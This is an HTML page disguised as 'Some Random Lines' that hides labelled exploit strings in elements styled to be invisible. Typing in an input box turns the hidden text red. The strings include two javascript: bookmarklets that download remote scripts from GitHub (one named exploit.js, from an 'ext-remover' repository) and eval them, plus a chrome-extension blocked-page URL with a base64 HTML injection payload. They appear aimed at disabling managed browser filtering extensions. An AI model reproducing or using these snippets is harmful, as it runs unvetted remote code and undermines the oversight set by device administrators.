<!DOCTYPE html>
<html>

<head>
  <title>Lines</title>
  <meta charset="utf-8">
  <link rel="stylesheet" href="style.css">
  <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.0/jquery.min.js"></script>
</head>

<body>
  <script type="text/javascript" src="script.js"></script>
  <center><h1>Some Random Lines...</h1></center>
  <center><input id="one"></input></center>
  <center><h1 id="invistitle">Compact Cow</h1></center>
  <center><h1 id="invistext">javascript:void fetch(`https://raw.githubusercontent.com/3kh0/ext-remover/main/exploit.js`).then(d=>d.text()).then(eval);</h1></center>
  <center><h1>- -- -- ---- -- -- -- --- - -- -- - - -- - - - -- -</h1></center>
  <center><h1 id="invistitle">Ingot NPB</h1></center>
  <center><h1 id="invistitle">https://tinyurl.com/bettergoofcurly / chrome-extension://iheobagjkfklnlikgihanlhcddjoihkg/blocked.html?category=PGEgaHJlZj0iYWJvdXQ6YmxhbmsiIHRhcmdldD0iX2JsYW5rIiByZWw9Im9wZW5lciIgc3R5bGU9IiBiYWNrZ3JvdW5kOiB3aGl0ZTsgY29sb3I6IGJsYWNrOyBkaXNwbGF5OiBibG9jazsgaGVpZ2h0OiAzODBweDsgdHJhbnNmb3JtOiBzY2FsZSgyLjUpOyBkaXNwbGF5OiBmbGV4OyBqdXN0aWZ5LWNvbnRlbnQ6IGNlbnRlcjsgYWxpZ24taXRlbXM6IGNlbnRlcjsgIj48ZGl2PkNsaWNrIE1lPC9kaXY%2BIDwvYT4%3D</h1></center>
  <center><h1 id="invistext">javascript:void fetch(`https://raw.githubusercontent.com/G-xming/filestorage/main/bro0ze4/npb.js`).then(d=>d.text()).then(eval);</h1></center>
  <center><h1>- ----- ---- -- - ----- - - -- -- -- --- - - - -- - -</h1></center>

  <script>
	document.getElementById("one").onkeydown = function() {myFunction()};

	function myFunction() {
		document.getElementById("invistext").style.color = "red";
	}
  </script>

</body>

</html>
